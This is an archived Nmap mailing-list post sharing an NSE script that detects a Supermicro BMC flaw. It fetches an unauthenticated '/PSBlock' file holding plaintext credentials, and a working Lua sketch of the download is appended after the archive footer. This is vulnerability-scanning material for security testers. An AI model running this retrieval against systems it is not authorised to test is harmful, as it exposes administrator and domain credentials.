Nmap Development mailing list archives

NSE: bmc-supermicro-conf. Attempts to download conf file from vulnerable Supermicro BMC products


From: Paulino Calderon <paulino () calderonpale com>
Date: Fri, 20 Jun 2014 04:47:45 -0500

Hi list,

I’m attaching an NSE script to detect a serious flaw affecting Supermicro BMCs. It seems the offsets change between products and versions so I left the credential parser out for now.

Cheers.

Download script: 
https://bitbucket.org/cldrn/nmap-nse-scripts/raw/aa043e48b5526253217208d20a8c61c5c967014b/scripts/6.x/bmc-supermicro-conf.nse

description = [[
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro BMC products.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains all users with their passwords in plain text form.

References:
* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
]]

---
-- @usage nmap -p49152 --script bmc-supermicro-conf <target>
-- 
-- @output
-- PORT      STATE SERVICE REASON
-- 49152/tcp open  unknown syn-ack
-- | bmc-supermicro-conf: 
-- |   VULNERABLE:
-- |   Supermicro BMC configuration file disclosure
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some Supermicro BMC products are vulnerable to an authentication bypass vulnerability that allows attackers to download
-- |       a configuration file containing plain text user credentials. These credentials may be used to log in to the
-- |       administrative interface and the network's Active Directory.
-- |     Disclosure date: 2014-06-19
-- |     Extra information:
-- |       Snippet from configuration file:
-- |   .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
-- |   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
-- |   
-- |     References:
-- |_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
--
-- @args bmc-supermicro-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
---
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
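As an added illustration of how the check described in the script header is structured (this is not the body of the linked script, only a sketch written against the Nmap 6.x NSE libraries: http, shortport, stdnse and vulns): the portrule matches TCP 49152, the action requests /PSBlock, treats a 200 response with a body as the exposure the description talks about, reports it through the vulns library and honours the out argument. The author string and the exact success test are assumptions.

```lua
-- Added illustration, not the code of the script linked in the post.
-- Uses only Nmap 6.x NSE library calls (http, shortport, stdnse, vulns).
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"

description = "Checks whether a Supermicro BMC serves /PSBlock on TCP 49152 without authentication."
author = "illustration (not the original script author)"   -- assumed placeholder
categories = {"vuln", "safe"}

-- Only run against the BMC web service port named in the post.
portrule = shortport.portnumber(49152, "tcp")

action = function(host, port)
  local vuln = {
    title = "Supermicro BMC configuration file disclosure",
    state = vulns.STATE.NOT_VULN,
    description = "The BMC returns its configuration file on an unauthenticated request for /PSBlock.",
    references = {"http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/"},
  }
  local report = vulns.Report:new(SCRIPT_NAME, host, port)

  local resp = http.get(host, port, "/PSBlock")
  -- Assumed success test: anything other than a 200 with a non-empty body
  -- is treated as "file not exposed" (the real script may check more).
  if not (resp and resp.status == 200 and resp.body and #resp.body > 0) then
    return report:make_output(vuln)
  end

  vuln.state = vulns.STATE.EXPLOIT
  vuln.extra_info = string.format("Received %d bytes for /PSBlock", #resp.body)

  -- Honour bmc-supermicro-conf.out; default name follows the post (<ip>_bmc.conf).
  local out = stdnse.get_script_args(SCRIPT_NAME .. ".out") or (host.ip .. "_bmc.conf")
  local fh, err = io.open(out, "wb")
  if fh then
    fh:write(resp.body)
    fh:close()
    vuln.extra_info = vuln.extra_info .. "\nConfiguration file saved to '" .. out .. "'"
  else
    vuln.extra_info = vuln.extra_info .. "\nCould not write " .. out .. ": " .. tostring(err)
  end
  return report:make_output(vuln)
end
```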

